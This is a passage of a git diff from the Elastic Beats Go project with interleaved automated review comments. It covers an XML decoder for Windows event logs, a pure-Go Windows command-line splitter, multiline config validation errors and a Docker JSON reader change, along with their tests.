can't be nil") + } + + if _, found := registeredDecoders[schema]; found { + return errors.New("already registered") + } + + registeredDecoders[schema] = dec + + return nil +} + +func newDecoder(cfg decodeXMLConfig) decoder { + newDec, found := registeredDecoders[cfg.Schema] + if !found { + return newDefaultDecoder(cfg) + } + return newDec(cfg) +} + +func registerDecoders() { + log := logp.L().Named(logName) + 
log.Debug(registerDecoder(wineventlogSchema, newWineventlogDecoder)) +} + +func newSchemaLessDecoder(cfg decodeXMLConfig) decoder { + return func(p []byte) (common.MapStr, error) { + dec := xml.NewDecoder(bytes.NewReader(p)) + if cfg.ToLower { + dec.LowercaseKeys() + } + + out, err := dec.Decode() + if err != nil { + return nil, err + } + + return common.MapStr(out), nil + } +} + +func newWineventlogDecoder(decodeXMLConfig) decoder { + return func(p []byte) (common.MapStr, error) { + evt, err := winevent.UnmarshalXML(p) + if err != nil { + return nil, err + } + return evt.Fields(), nil + } +} diff --git a/libbeat/processors/decode_xml/schema_test.go b/libbeat/processors/decode_xml/schema_test.go new file mode 100644 index 00000000000..655c5156fe2 --- /dev/null +++ b/libbeat/processors/decode_xml/schema_test.go 
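Review bot: In `registerDecoders`, `log.Debug(registerDecoder(wineventlogSchema, newWineventlogDecoder))` logs `<nil>` at debug level on success and hides a failed registration from anyone not running with debug logging. Check the error and report it at error level: `if err := registerDecoder(wineventlogSchema, newWineventlogDecoder); err != nil { log.Errorf("registering %q decoder: %v", wineventlogSchema, err) }`. Separately, `newDecoder` falls back to `newDefaultDecoder` for any schema name it does not find. Unless the config is validated elsewhere (not visible in this hunk), a misspelled `schema` would silently produce schema-less fields instead of the wineventlog layout that downstream rules expect. The unexported helpers also have no comments; `// newDecoder returns the decoder registered for cfg.Schema, or the schema-less decoder when none is registered.` would document that fallback.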
@@ -0,0 +1,130 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" +) + +func TestDecodeSchemas(t *testing.T) { + var testCases = []struct { + schema string + config decodeXMLConfig + Input common.MapStr + Output common.MapStr + error bool + errorMessage string + }{ + { + schema: wineventlogSchema, + config: decodeXMLConfig{ + Field: "message", + Target: &testXMLTargetField, + Schema: wineventlogSchema, + }, + Input: common.MapStr{ + "message": "" + + "4672001254800x8020000000000000" + + "11303Securityvagrant" + + "S-1-5-18SYSTEMNT AUTHORITY0x3e7" + + "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\t" + + "SeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege" + + "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity 
ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\n" + + "Privileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\t" + + "SeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformation" + + "Special LogonInfoSecurityMicrosoft Windows security auditing.Audit Success", + }, + Output: common.MapStr{ + "xml": common.MapStr{ + "channel": "Security", + "outcome": "success", + "activity_id": "{ffb23523-1f32-0000-c335-b2ff321fd701}", + "level": "information", + "event_id": uint32(4672), + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": uint64(11303), + "computer_name": "vagrant", + "time_created": func() time.Time { + t, _ := time.Parse(time.RFC3339Nano, "2021-03-23T09:56:13.137310000Z") + return t + }(), + "opcode": "Info", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "event_data": common.MapStr{ + "SubjectUserSid": "S-1-5-18", + "SubjectUserName": "SYSTEM", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e7", + "PrivilegeList": "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + }, + "task": "Special Logon", + "keywords": []string{ + "Audit Success", + }, + "message": "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon 
ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "process": common.MapStr{ + "pid": uint32(652), + "thread": common.MapStr{ + "id": uint32(4660), + }, + }, + }, + "message": "" + + "4672001254800x8020000000000000" + + "11303Securityvagrant" + + "S-1-5-18SYSTEMNT AUTHORITY0x3e7" + + "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\t" + + "SeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege" + + "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\n" + + "Privileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\t" + + "SeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformation" + + "Special LogonInfoSecurityMicrosoft Windows security auditing.Audit Success", + }, + }, + } + + for _, test := range testCases { + test := test + t.Run(test.schema, func(t *testing.T) { + t.Parallel() + + f, err := newDecodeXML(test.config) + require.NoError(t, err) + + event := &beat.Event{ + Fields: test.Input, + } + newEvent, err := f.Run(event) + if !test.error { + assert.NoError(t, err) + } else { + if assert.Error(t, err) { + 
assert.Contains(t, err.Error(), test.errorMessage) + } + } + assert.Equal(t, test.Output, newEvent.Fields) + }) + } +} diff --git a/libbeat/processors/script/javascript/module/windows/windows.go b/libbeat/processors/script/javascript/module/windows/windows.go index 2bbe7817fad..b7f306714f2 100644 --- a/libbeat/processors/script/javascript/module/windows/windows.go +++ b/libbeat/processors/script/javascript/module/windows/windows.go @@ -15,14 +15,9 @@ // specific language governing permissions and limitations // under the License. -// +build windows - package windows import ( - "syscall" - "unsafe" - "github.com/dop251/goja" "github.com/dop251/goja_nodejs/require" ) 
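Review bot: The table in `TestDecodeSchemas` declares `error` and `errorMessage`, but its only case is the successful wineventlog decode, so the failure branch is never exercised. Add a case whose `message` is not well-formed XML with `error: true`, so that behaviour on corrupt event data is pinned. `assert.Equal(t, test.Output, newEvent.Fields)` also runs after an error; if `Run` can return a nil event there (not visible in this hunk) that line would panic, so guard it with `if newEvent != nil {`. The error from `time.Parse` in the `time_created` literal is discarded, so a typo in the timestamp would surface only as a confusing mismatch on the zero time.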
@@ -30,34 +25,73 @@ import ( // SplitCommandLine splits a string into a list of space separated arguments. // See Window's CommandLineToArgvW for more details. func SplitCommandLine(cmd string) []string { - args, err := commandLineToArgvW(cmd) - if err != nil { - panic(err) - } - - return args + return commandLineToArgv(cmd) } -func commandLineToArgvW(in string) ([]string, error) { - ptr, err := syscall.UTF16PtrFromString(in) - if err != nil { - return nil, err +// appendBSBytes appends n '\\' bytes to b and returns the resulting slice. +func appendBSBytes(b []byte, n int) []byte { + for ; n > 0; n-- { + b = append(b, '\\') } + return b +} - var numArgs int32 - argsWide, err := syscall.CommandLineToArgv(ptr, &numArgs) - if err != nil { - return nil, err +// readNextArg splits command line string cmd into next +// argument and command line remainder. +func readNextArg(cmd string) (arg []byte, rest string) { + var b []byte + var inquote bool + var nslash int + for ; len(cmd) > 0; cmd = cmd[1:] { + c := cmd[0] + switch c { + case ' ', '\t': + if !inquote { + return appendBSBytes(b, nslash), cmd[1:] + } + case '"': + b = appendBSBytes(b, nslash/2) + if nslash%2 == 0 { + // use "Prior to 2008" rule from + // http://daviddeley.com/autohotkey/parameters/parameters.htm + // section 5.2 to deal with double double quotes + if inquote && len(cmd) > 1 && cmd[1] == '"' { + b = append(b, c) + cmd = cmd[1:] + } + inquote = !inquote + } else { + b = append(b, c) + } + nslash = 0 + continue + case '\\': + nslash++ + continue + } + b = appendBSBytes(b, nslash) + nslash = 0 + b = append(b, c) } + return appendBSBytes(b, nslash), "" +} - // Free memory allocated for CommandLineToArgvW arguments. 
- defer syscall.LocalFree((syscall.Handle)(unsafe.Pointer(argsWide))) - - args := make([]string, numArgs) - for idx := range args { - args[idx] = syscall.UTF16ToString(argsWide[idx][:]) +// commandLineToArgv splits a command line into individual argument +// strings, following the Windows conventions documented +// at http://daviddeley.com/autohotkey/parameters/parameters.htm#WINARGV +// Original implementation found at: https://github.com/golang/go/commit/39c8d2b7faed06b0e91a1ad7906231f53aab45d1 +func commandLineToArgv(cmd string) []string { + var args []string + for len(cmd) > 0 { + if cmd[0] == ' ' || cmd[0] == '\t' { + cmd = cmd[1:] + continue + } + var arg []byte + arg, cmd = readNextArg(cmd) + args = append(args, string(arg)) } - return args, nil + return args } // Require registers the windows module that has utilities specific to diff --git a/libbeat/processors/script/javascript/module/windows/windows_test.go b/libbeat/processors/script/javascript/module/windows/windows_test.go index be213a79ba8..63f55f54fc7 100644 --- a/libbeat/processors/script/javascript/module/windows/windows_test.go +++ b/libbeat/processors/script/javascript/module/windows/windows_test.go @@ -15,8 +15,6 @@ // specific language governing permissions and limitations // under the License. -// +build windows - package windows import ( 
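Review bot: `SplitCommandLine` still says "See Window's CommandLineToArgvW for more details", but it now runs the pure-Go `commandLineToArgv`, whose output is not guaranteed to match the Win32 call. Empty input returns nil here, whereas CommandLineToArgvW returns the current executable path, and as far as I know the Win32 parser also treats the first (program) token differently from later arguments. If scripts use this helper to derive argument lists from recorded command lines, a split that differs from what the process itself saw can make argument-based detections miss. Update the comment, e.g. `// SplitCommandLine splits cmd with a pure-Go port of the Windows argv rules; results can differ from CommandLineToArgvW (empty input returns nil).`, and add a test for a quoted program path that ends in a backslash so the chosen behaviour is explicit.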
@@ -25,33 +23,118 @@ import ( "github.com/stretchr/testify/assert" ) -const quotedCommandLine = `"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=en_US" "-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache" "-steampid=796" "-buildid=1546909276" "-steamid=0" "-steamuniverse=Dev" "-clientui=C:\Program Files (x86)\Steam\clientui" --disable-spell-checking --disable-out-of-process-pac --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents --enable-media-stream --disable-smooth-scrolling --num-raster-threads=4 --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt"` - -func TestSplitCommandLine(t *testing.T) { - args := SplitCommandLine(quotedCommandLine) - - for _, a := range args { - t.Log(a) +func TestCommandLineToArgv(t *testing.T) { + cases := []struct { + cmd string + args []string + }{ + { + cmd: ``, + args: nil, + }, + { + cmd: ` `, + args: nil, + }, + { + cmd: "\t", + args: nil, + }, + { + cmd: `test`, + args: []string{`test`}, + }, + { + cmd: `test a b c`, + args: []string{`test`, `a`, `b`, `c`}, + }, + { + cmd: `test "`, + args: []string{`test`, ``}, + }, + { + cmd: `test ""`, + args: []string{`test`, ``}, + }, + { + cmd: `test """`, + args: []string{`test`, `"`}, + }, + { + cmd: `test "" a`, + args: []string{`test`, ``, `a`}, + }, + { + cmd: `test "123"`, + args: []string{`test`, `123`}, + }, + { + cmd: `test \"123\"`, + args: []string{`test`, `"123"`}, + }, + { + cmd: `test \"123 456\"`, + args: []string{`test`, `"123`, `456"`}, + }, + { + cmd: `test \\"`, + args: []string{`test`, `\`}, + }, + { + cmd: `test \\\"`, + args: []string{`test`, `\"`}, + }, + { + cmd: `test \\\\\"`, + args: []string{`test`, `\\"`}, + }, + { + cmd: `test \\\"x`, + args: []string{`test`, `\"x`}, + }, + { + cmd: `test """"\""\\\"`, + args: []string{`test`, `""\"`}, + }, + { + cmd: `"cmd line" abc`, + args: []string{`cmd line`, `abc`}, + }, + { + cmd: `test 
\\\\\""x"""y z`, + args: []string{`test`, `\\"x"y z`}, + }, + { + cmd: "test\tb\t\"x\ty\"", + args: []string{`test`, `b`, "x\ty"}, + }, + { + cmd: `"C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe" "-lang=en_US" "-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache" "-steampid=796" "-buildid=1546909276" "-steamid=0" "-steamuniverse=Dev" "-clientui=C:\Program Files (x86)\Steam\clientui" --disable-spell-checking --disable-out-of-process-pac --enable-blink-features=ResizeObserver,Worklet,AudioWorklet --disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents --enable-media-stream --disable-smooth-scrolling --num-raster-threads=4 --enable-direct-write "--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt"`, + args: []string{ + `C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe`, + `-lang=en_US`, + `-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache`, + `-steampid=796`, + `-buildid=1546909276`, + `-steamid=0`, + `-steamuniverse=Dev`, + `-clientui=C:\Program Files (x86)\Steam\clientui`, + `--disable-spell-checking`, + `--disable-out-of-process-pac`, + `--enable-blink-features=ResizeObserver,Worklet,AudioWorklet`, + `--disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents`, + `--enable-media-stream`, + `--disable-smooth-scrolling`, + `--num-raster-threads=4`, + `--enable-direct-write`, + `--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt`, + }, + }, } - expected := []string{ - `C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe`, - `-lang=en_US`, - `-cachedir=C:\Users\jimmy\AppData\Local\Steam\htmlcache`, - `-steampid=796`, - `-buildid=1546909276`, - `-steamid=0`, - `-steamuniverse=Dev`, - `-clientui=C:\Program Files (x86)\Steam\clientui`, - `--disable-spell-checking`, - `--disable-out-of-process-pac`, - `--enable-blink-features=ResizeObserver,Worklet,AudioWorklet`, - `--disable-features=TouchpadAndWheelScrollLatching,AsyncWheelEvents`, - `--enable-media-stream`, - 
`--disable-smooth-scrolling`, - `--num-raster-threads=4`, - `--enable-direct-write`, - `--log-file=C:\Program Files (x86)\Steam\logs\cef_log.txt`, + for _, tc := range cases { + t.Run(tc.cmd, func(t *testing.T) { + assert.Equal(t, tc.args, SplitCommandLine(tc.cmd)) + }) } - assert.Equal(t, expected, args) } diff --git a/libbeat/processors/translate_sid/translatesid.go b/libbeat/processors/translate_sid/translatesid.go index f794019d78e..5a7cfcf5fb7 100644 --- a/libbeat/processors/translate_sid/translatesid.go +++ b/libbeat/processors/translate_sid/translatesid.go @@ -32,7 +32,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/processors" jsprocessor "github.com/elastic/beats/v7/libbeat/processors/script/javascript/module/processor" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) const logName = "processor.translate_sid" @@ -117,7 +117,7 @@ func (p *processor) translateSID(event *beat.Event) error { } } if p.AccountTypeTarget != "" { - if _, err = event.PutValue(p.AccountTypeTarget, sys.SIDType(accountType).String()); err != nil { + if _, err = event.PutValue(p.AccountTypeTarget, winevent.SIDType(accountType).String()); err != nil { errs = append(errs, err) } } diff --git a/libbeat/processors/translate_sid/translatesid_test.go b/libbeat/processors/translate_sid/translatesid_test.go index 529f90b065f..bd9ba9e1404 100644 --- a/libbeat/processors/translate_sid/translatesid_test.go +++ b/libbeat/processors/translate_sid/translatesid_test.go 
@@ -29,21 +29,21 @@ import ( "golang.org/x/sys/windows" "github.com/elastic/beats/v7/libbeat/beat" - "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) func TestTranslateSID(t *testing.T) { var tests = []struct { SID string Account string - AccountType sys.SIDType + AccountType winevent.SIDType Domain string Assert func(*testing.T, *beat.Event, error) }{ {SID: "S-1-5-7", Domain: "NT AUTHORITY", Account: "ANONYMOUS LOGON"}, {SID: "S-1-0-0", Account: "NULL SID"}, {SID: "S-1-1-0", Account: "Everyone"}, - {SID: "S-1-5-32-544", Domain: "BUILTIN", Account: "Administrators", AccountType: sys.SidTypeAlias}, + {SID: "S-1-5-32-544", Domain: "BUILTIN", Account: "Administrators", AccountType: winevent.SidTypeAlias}, {SID: "S-1-5-113", Domain: "NT AUTHORITY", Account: "Local Account"}, {SID: "", Assert: assertInvalidSID}, {SID: "Not a SID", Assert: assertInvalidSID}, diff --git a/libbeat/reader/multiline/multiline_config.go b/libbeat/reader/multiline/multiline_config.go index b2f54eb92c7..d8b63b107e3 100644 --- a/libbeat/reader/multiline/multiline_config.go +++ b/libbeat/reader/multiline/multiline_config.go @@ -18,6 +18,7 @@ package multiline import ( + "errors" "fmt" "time" @@ -42,6 +43,9 @@ var ( countStr: countMode, whilePatternStr: whilePatternMode, } + + ErrMissingPattern = errors.New("multiline.pattern cannot be empty when pattern based matching is selected") + ErrMissingCount = errors.New("multiline.pattern cannot be empty when pattern based matching is selected") ) // Config holds the options of multiline readers. 
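Review bot: `ErrMissingCount` carries the same text as `ErrMissingPattern`, so a count-mode config with `count_lines` unset now reports that `multiline.pattern` is empty. The message this commit removes from `Validate` in the following hunk named `multiline.count_lines`. Restore it in the sentinel: `ErrMissingCount = errors.New("multiline.count_lines cannot be zero when count based is selected")`. The new test in multiline_config_test.go compares against `ErrMissingCount.Error()`, so it passes with either text and will not catch this. Both exported variables also lack doc comments, e.g. `// ErrMissingPattern is returned by Validate when a pattern based mode has no pattern.`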
@@ -66,15 +70,15 @@ func (c *Config) Validate() error { return fmt.Errorf("unknown matcher type: %s", c.Match) } if c.Pattern == nil { - return fmt.Errorf("multiline.pattern cannot be empty when pattern based matching is selected") + return ErrMissingPattern } } else if c.Type == countMode { if c.LinesCount == 0 { - return fmt.Errorf("multiline.count_lines cannot be zero when count based is selected") + return ErrMissingCount } } else if c.Type == whilePatternMode { if c.Pattern == nil { - return fmt.Errorf("multiline.pattern cannot be empty when pattern based matching is selected") + return ErrMissingPattern } } return nil diff --git a/libbeat/reader/multiline/multiline_config_test.go b/libbeat/reader/multiline/multiline_config_test.go new file mode 100644 index 00000000000..4120faf2824 --- /dev/null +++ b/libbeat/reader/multiline/multiline_config_test.go 
@@ -0,0 +1,106 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package multiline + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/common" +) + +func TestInvalidConfiguration(t *testing.T) { + testcases := map[string]struct { + config map[string]interface{} + expectedError error + }{ + "missing multiline pattern": { + config: map[string]interface{}{ + "match": "before", + }, + expectedError: ErrMissingPattern, + }, + "unknown multiline mode": { + config: map[string]interface{}{ + "type": "no_such_mode", + }, + expectedError: fmt.Errorf("unknown multiline type: no_such_mode"), + }, + "missing multiline count": { + config: map[string]interface{}{ + "type": "count", + }, + expectedError: ErrMissingCount, + }, + "missing multiline pattern when while_pattern type is selected": { + config: map[string]interface{}{ + "type": "while_pattern", + }, + expectedError: ErrMissingPattern, + }, + } + + for name, test := range testcases { + test := test + t.Run(name, func(t *testing.T) { + var config Config + c := common.MustNewConfigFrom(test.config) + err := c.Unpack(&config) + require.NotNil(t, err) + require.Contains(t, err.Error(), test.expectedError.Error()) + }) + 
} +} + +func TestValidConfiguration(t *testing.T) { + testcases := map[string]struct { + config map[string]interface{} + }{ + "correct pattern based multiline": { + config: map[string]interface{}{ + "type": "pattern", + "match": "before", + "pattern": "^\n", + }, + }, + "correct while_pattern based multiline": { + config: map[string]interface{}{ + "type": "while_pattern", + "pattern": "^\n", + }, + }, + "correct count based multiline": { + config: map[string]interface{}{ + "type": "count", + "count_lines": 5, + }, + }, + } + + for name, test := range testcases { + test := test + t.Run(name, func(t *testing.T) { + var config Config + c := common.MustNewConfigFrom(test.config) + err := c.Unpack(&config) + require.Nil(t, err) + }) + } +} diff --git a/libbeat/reader/reader.go b/libbeat/reader/reader.go index 81ae4ad8241..43c389ac7c6 100644 --- a/libbeat/reader/reader.go +++ b/libbeat/reader/reader.go @@ -18,7 +18,6 @@ package reader import ( - "errors" "io" ) @@ -30,8 +29,3 @@ type Reader interface { io.Closer Next() (Message, error) } - -var ( - //ErrLineUnparsable is error thrown when Next() element from input is corrupted and can not be parsed - ErrLineUnparsable = errors.New("line is unparsable") -) diff --git a/libbeat/reader/readjson/docker_json.go b/libbeat/reader/readjson/docker_json.go index 59dded97ec3..d57c61c6a26 100644 --- a/libbeat/reader/readjson/docker_json.go +++ b/libbeat/reader/readjson/docker_json.go @@ -202,7 +202,7 @@ func (p *DockerJSONReader) Next() (reader.Message, error) { err = p.parseLine(&message, &logLine) if err != nil { p.logger.Errorf("Parse line error: %v", err) - return message, reader.ErrLineUnparsable + continue } // Handle multiline messages, join partial lines 
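Review bot: In `DockerJSONReader.Next`, a line that fails `parseLine` is now dropped with only `p.logger.Errorf("Parse line error: %v", err)` as a trace, both here and in the hunk at -219. A file with many corrupt lines therefore produces one error-level entry per line and no count of what was lost; a rate-limited message plus a dropped-line counter would let gaps in shipped container logs be noticed. In the -219 hunk the `continue` sits before `message.Content = append(message.Content, next.Content...)`, so if that loop is the partial-line join, the fragment after a skipped one is appended to an incomplete message. A why-comment above each `continue` would help, e.g. `// Skip the unparsable line; its bytes stay counted in message.Bytes.`, which is what the new "keep correct bytes count" test expects. `Next` begins and ends outside both hunks, so the loop structure is inferred.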
@@ -219,7 +219,7 @@ func (p *DockerJSONReader) Next() (reader.Message, error) { err = p.parseLine(&next, &logLine) if err != nil { p.logger.Errorf("Parse line error: %v", err) - return message, reader.ErrLineUnparsable + continue } message.Content = append(message.Content, next.Content...) } diff --git a/libbeat/reader/readjson/docker_json_test.go b/libbeat/reader/readjson/docker_json_test.go index 2c9e2e71104..de03b87da81 100644 --- a/libbeat/reader/readjson/docker_json_test.go +++ b/libbeat/reader/readjson/docker_json_test.go @@ -18,6 +18,7 @@ package readjson import ( + "io" "testing" "time" @@ -53,7 +54,7 @@ func TestDockerJSON(t *testing.T) { name: "Wrong JSON", input: [][]byte{[]byte(`this is not JSON`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 16, }, @@ -73,7 +74,7 @@ func TestDockerJSON(t *testing.T) { name: "Wrong CRI", input: [][]byte{[]byte(`2017-09-12T22:32:21.212861448Z stdout`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 37, }, @@ -82,7 +83,7 @@ func TestDockerJSON(t *testing.T) { name: "Wrong CRI", input: [][]byte{[]byte(`{this is not JSON nor CRI`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 25, }, @@ -91,7 +92,7 @@ func TestDockerJSON(t *testing.T) { name: "Missing time", input: [][]byte{[]byte(`{"log":"1:M 09 Nov 13:27:36.276 # User requested shutdown...\n","stream":"stdout"}`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 82, }, 
@@ -218,7 +219,7 @@ func TestDockerJSON(t *testing.T) { input: [][]byte{[]byte(`{"log":"1:M 09 Nov 13:27:36.276 # User requested shutdown...\n","stream":"stdout"}`)}, stream: "all", format: "cri", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 82, }, @@ -228,7 +229,7 @@ func TestDockerJSON(t *testing.T) { input: [][]byte{[]byte(`2017-09-12T22:32:21.212861448Z stdout 2017-09-12 22:32:21.212 [INFO][88] table.go 710: Invalidating dataplane cache`)}, stream: "all", format: "docker", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 115, }, @@ -300,7 +301,7 @@ func TestDockerJSON(t *testing.T) { []byte(`{"log":"shutdown...\n","stream`), }, stream: "stdout", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 139, }, @@ -324,11 +325,25 @@ func TestDockerJSON(t *testing.T) { name: "Corrupted log message line", input: [][]byte{[]byte(`36.276 # User requested shutdown...\n","stream":"stdout","time":"2017-11-09T13:27:36.277747246Z"}`)}, stream: "all", - expectedError: reader.ErrLineUnparsable, + expectedError: io.EOF, expectedMessage: reader.Message{ Bytes: 97, }, }, + { + name: "Corrupted log message line is skipped, keep correct bytes count", + input: [][]byte{ + []byte(`36.276 # User requested shutdown...\n","stream":"stdout","time":"2017-11-09T13:27:36.277747246Z"}`), + []byte(`{"log":"1:M 09 Nov 13:27:36.276 # User requested","stream":"stdout","time":"2017-11-09T13:27:36.277747246Z"}`), + }, + stream: "all", + expectedMessage: reader.Message{ + Content: []byte("1:M 09 Nov 13:27:36.276 # User requested"), + Fields: common.MapStr{"stream": "stdout"}, + Ts: time.Date(2017, 11, 9, 13, 27, 36, 277747246, time.UTC), + Bytes: 205, + }, + }, } for _, test := range tests { 
@@ -358,6 +373,12 @@ type mockReader struct { } func (m *mockReader) Next() (reader.Message, error) { + if len(m.messages) < 1 { + return reader.Message{ + Content: []byte{}, + Bytes: 0, + }, io.EOF + } message := m.messages[0] m.messages = m.messages[1:] return reader.Message{ diff --git a/libbeat/scripts/Makefile b/libbeat/scripts/Makefile index 9598cdd7876..e863d1dacb2 100755 --- a/libbeat/scripts/Makefile +++ b/libbeat/scripts/Makefile @@ -10,7 +10,7 @@ BEAT_PATH?=${BEATS_ROOT}/${BEAT_NAME} BEAT_IMPORT_PATH?=${BEATS_ROOT_IMPORT_PATH}/${BEAT_FULL_NAME} BEAT_PACKAGE_NAME?=${BEAT_NAME} BEAT_INDEX_PREFIX?=${BEAT_NAME} -BEAT_URL?=https://www.elastic.co/products/beats/${BEAT_NAME} ## @packaging Link to the homepage of the application +BEAT_URL?=https://www.elastic.co/beats/${BEAT_NAME} ## @packaging Link to the homepage of the application BEAT_DOC_URL?=https://www.elastic.co/guide/en/beats/${BEAT_NAME}/current/index.html ## @packaging Link to the user documentation of the application BEAT_LICENSE?=ASL 2.0 ## @packaging Software license of the application BEAT_VENDOR?=Elastic ## @packaging Name of the vendor of the application @@ -270,6 +270,7 @@ load-tests: ## @testing Runs load tests # Sets up the virtual python environment .PHONY: python-env +python-env: export CRYPTOGRAPHY_DONT_BUILD_RUST=1 python-env: ${ES_BEATS}/libbeat/tests/system/requirements.txt @test -e ${PYTHON_ENV}/bin/activate || ${PYTHON_EXE} -m venv ${VENV_PARAMS} ${PYTHON_ENV} @. ${PYTHON_ENV}/bin/activate && pip install 